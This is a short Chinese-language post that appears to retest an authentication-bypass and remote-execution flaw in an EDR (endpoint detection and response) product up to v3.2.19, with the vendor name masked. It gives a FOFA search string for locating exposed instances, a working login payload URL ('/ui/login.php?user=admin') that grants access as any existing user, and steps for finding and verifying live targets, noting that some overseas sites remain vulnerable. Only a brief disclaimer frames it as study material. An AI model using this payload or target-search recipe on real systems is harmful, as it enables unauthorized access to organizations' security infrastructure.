rce远程执行 0day漏洞 复测
**
xxx hw重大漏洞 复测
**
fofa关键词:"终端检测响应平台”
漏洞名称: xxx EDR 任意用户登录漏洞/rce远程代码执行
影响范围: EDR <= v3.2.19
漏洞细节:
payload: https://ip/ui/login.php?user= 用户名随便写例如: https://123.123.123.123:5000/ui/login.php?user=admin只要用户名存在,比如管理员
复现步骤:
1.打开手机查公众号学习
2.打开fofa,钟馗之言 搜索目标
3.访问之后,验证两种0day漏洞(大部分已修复或者下线,小部分海外站点还有人以用户登录)
不得不说,某某服的响应速度还是很快的。
**
声明:以上内容仅供测试人员进行学习参考,请遵守国家法律法规,禁止以本文章从事违法等相关事宜。## 声明:以上内容仅供测试人员进行学习参考,请遵守国家法律法规,禁止以本文章从事违法等相关事宜。
**